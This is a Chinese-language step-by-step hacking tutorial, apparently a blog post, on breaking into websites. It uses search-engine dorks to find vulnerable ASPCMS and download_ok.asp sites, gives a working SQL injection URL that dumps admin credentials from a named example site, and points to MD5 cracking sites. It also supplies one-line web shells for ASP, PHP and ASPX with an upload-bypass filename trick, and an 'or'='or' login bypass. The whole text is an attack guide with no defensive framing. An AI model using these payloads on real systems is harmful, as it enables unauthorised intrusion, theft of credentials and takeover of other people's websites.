渗透(龙帝)

一、Powered by aspcms.com Copyright ?2010-2011

步奏1.

首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011

步奏2.

可以看到有许多站 随便进去一个

接着利用注入漏洞

/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

把这段文字添加到域名后面 比如 www.kastas.cn 就把这段文字添加到这个cn后面

显示:

发表于:2014-4-26 8:26:00 评论者:admin IP:
ea42f1bc4322ef9d
首页上一页1下一页末页


ea42f1bc4322ef9d 这个就是网站密码 我们去解这个密码 http://pmd5.com/?action=getpwd

明文:ella98744

步奏3.

去登陆后台 

********************************************************************************

原理1.

Powered by aspcms.com Copyright ?2010-2011   注入原理

(wait)

原理2.

MD5破解网站

http://md5.syue.com/OtherSite-md5.Asp

二、织梦内容管理系统 V57_GBK_SP1

方法:织梦通杀工具 

三、中国菜刀

步奏1.

<%eval request("520")%> 这个一句话木马 放在记事本里 然后另存为

然后保存类型 选择为所有文件 文件名 为l.asp;.jpg 也就是桌面上那个

好了 把这个上传

步奏2.

用菜刀连接了

原理

菜刀

参考 http://huaidan.org/archives/3472.html

Asp环境:<%eval request("a")%>

Php环境:<?php @eval($_POST['a']);?>

Aspx环境:<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>

四、inurl:download_ok.asp?

步奏1.

关键字:inurl:download_ok.asp?

步奏2.后台

/admin

账户名和密码 输入 'or'='or'

*扩展

漏洞

http://www.ihonker.org/forum.php?mod=viewthread&tid=5303&extra=page=1&orderby=dateline

后台

http://www.myhack58.com/Article/html/3/8/2014/49569.htm

原文地址:https://www.cnblogs.com/yaolei/p/4722369.html